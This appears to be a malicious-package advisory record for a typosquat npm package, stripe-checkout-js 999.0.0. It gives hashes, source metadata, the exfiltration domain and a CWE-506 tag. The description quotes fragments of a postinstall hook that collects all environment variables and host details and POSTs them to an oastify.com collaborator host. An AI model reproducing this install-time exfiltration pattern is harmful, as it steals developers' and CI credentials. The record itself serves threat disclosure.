-= Per source details. Do not edit below this line.=-
On npm install, postinstall.js enumerates the full process.env keyspace plus host identifiers (os.hostname(), username, homedir, cwd, argv, OS details) and POSTs the resulting JSON payload over HTTPS to rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com — a Burp Collaborator out-of-band subdomain used as attacker-controlled exfiltration infrastructure. The relevant code is Object.keys(process.env).sort().forEach(k => { env[k] = process.env[k]; }) followed by https.request({hostname: 'rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com', port: 443,..., method: 'POST'}). On developer and CI hosts, process.env routinely contains credential-grade values (AWS_*, NPMTOKEN, GITHUBTOKEN, CI/CD secrets), all of which are captured and shipped off-host without consent. The package name typosquats the legitimate stripe-checkout-js, and the version (999.0.0) is consistent with a placeholder/squat release rather than a real maintained library.
{
"malicious-packages-origins": [
{
"versions": [
"999.0.0"
],
"sha256": "44686181e7933593b67bda202e35b54f8d9927ac721f1836bcf91a7ee7ec00ff",
"source": "amazon-inspector",
"modified_time": "2026-06-09T16:07:30Z",
"id": "IN-MAL-2026-004970",
"import_time": "2026-06-09T16:59:45.171006742Z"
},
{
"versions": [
"999.0.0"
],
"sha256": "65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566",
"source": "amazon-inspector",
"modified_time": "2026-06-09T16:07:30Z",
"id": "IN-MAL-2026-004969",
"import_time": "2026-06-09T16:59:45.125117471Z"
}
]
}{
"package_integrity": [
{
"filename": "stripe-checkout-js-999.0.0.tgz",
"hashes": {
"sha512_sri": "sha512-/Hnw/Gt3/JDVqZDYgbPnRSeKD1n1bDZaLogF+oUQEzKhtD3lD+E5WAyv5Xx5Mi19EUI/37l24RQvYwSO3OyIgQ==",
"sha1": "00eae02c4d1a0d7050ff4ab7d79f4d6b007a8a8d"
}
}
],
"evidence_files": [
{
"sha256": "1ded8a789cf3732b19e4d08f9f8b224a4c81914daad56d165ca4fbce8cf21e07",
"path": "postinstall.js",
"tlsh": "762115e152f4867413f23b88b09e95015677f1173a0778f4bdcd52151fac62812f2579"
}
],
"domains": [
"rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@0xlr/stripe-checkout-js/MAL-2026-5388.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]